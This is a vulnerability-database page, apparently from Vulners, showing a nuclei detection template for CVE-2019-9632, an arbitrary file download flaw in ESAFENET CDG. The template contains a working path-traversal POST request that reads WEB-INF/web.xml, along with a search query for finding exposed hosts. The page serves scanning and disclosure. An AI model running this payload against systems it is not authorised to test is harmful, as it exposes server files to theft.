Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

ESAFENET CDG - Arbitrary File Download

🗓️ 28 Jun 2026 03:02:45Reported by ProjectDiscoveryType 
nuclei
 nuclei🔗 github.com👁 86 Views

ESAFENET CDG - Arbitrary File Download vulnerability via fileName parameter in download.js

Related
Refs
Code
ReporterTitlePublishedViews
Family
CVE		CVE-2019-9632
8 Mar 201906:00
cve
Cvelist		CVE-2019-9632
8 Mar 201906:00
cvelist
NVD		CVE-2019-9632
8 Mar 201907:29
nvd
OSV		CVE-2019-9632
8 Mar 201907:29
osv
Prion		Design/Logic Flaw
8 Mar 201907:29
prion
RedhatCVE		CVE-2019-9632
22 May 202508:22
redhatcve
id: CVE-2019-9632

info:
  name: ESAFENET CDG - Arbitrary File Download
  author: pdteam
  severity: high
  description: |
    ESAFENET CDG V3 and V5 has an arbitrary file download vulnerability via the fileName parameter in download.jsp because the InstallationPack parameter is mishandled in a /CDGServer3/ClientAjax request.
  impact: |
    Attackers can download arbitrary files from the server, potentially leading to information disclosure or further exploitation.
  remediation: |
    Apply the latest security patches or update to the latest version provided by ESAFENET.
  reference:
    - https://github.com/HimmelAward/Goby_POC
    - https://github.com/Z0fhack/Goby_POC
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2019-9632
    epss-score: 0.39885
    epss-percentile: 0.98444
    cpe: cpe:2.3:a:esafenet:electronic_document_security_management_system:v3:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: esafenet
    product: "electronic_document_security_management_system"
    fofa-query: "title=\"电子文档安全管理系统\""
  tags: cve,cve2019,esafenet,lfi,vuln

http:
  - method: POST
    path:
      - "{{BaseURL}}/CDGServer3/ClientAjax"

    headers:
      Content-Type: application/x-www-form-urlencoded

    body: |
      command=downclientpak&InstallationPack=../WEB-INF/web.xml&forward=index.jsp

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "<servlet-name>CDGPermissions</servlet-name>"
# digest: 4b0a00483046022100a622331f17878db84c60efe45767469514891da88d29e85a6b7737bcee6a4884022100ef74f2b197d9660c0b155ecc1d67cfc370ce8a120bebfeb28b7ddffc3a7c0584:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 25
CVSS 37.5
EPSS0.39885
esafenetelectronicdocumentsecuritymanagementvulnerabilityfilenamedownloadjsparbitraryfilecvsswebpostapplicationmatchersstatusservletname
86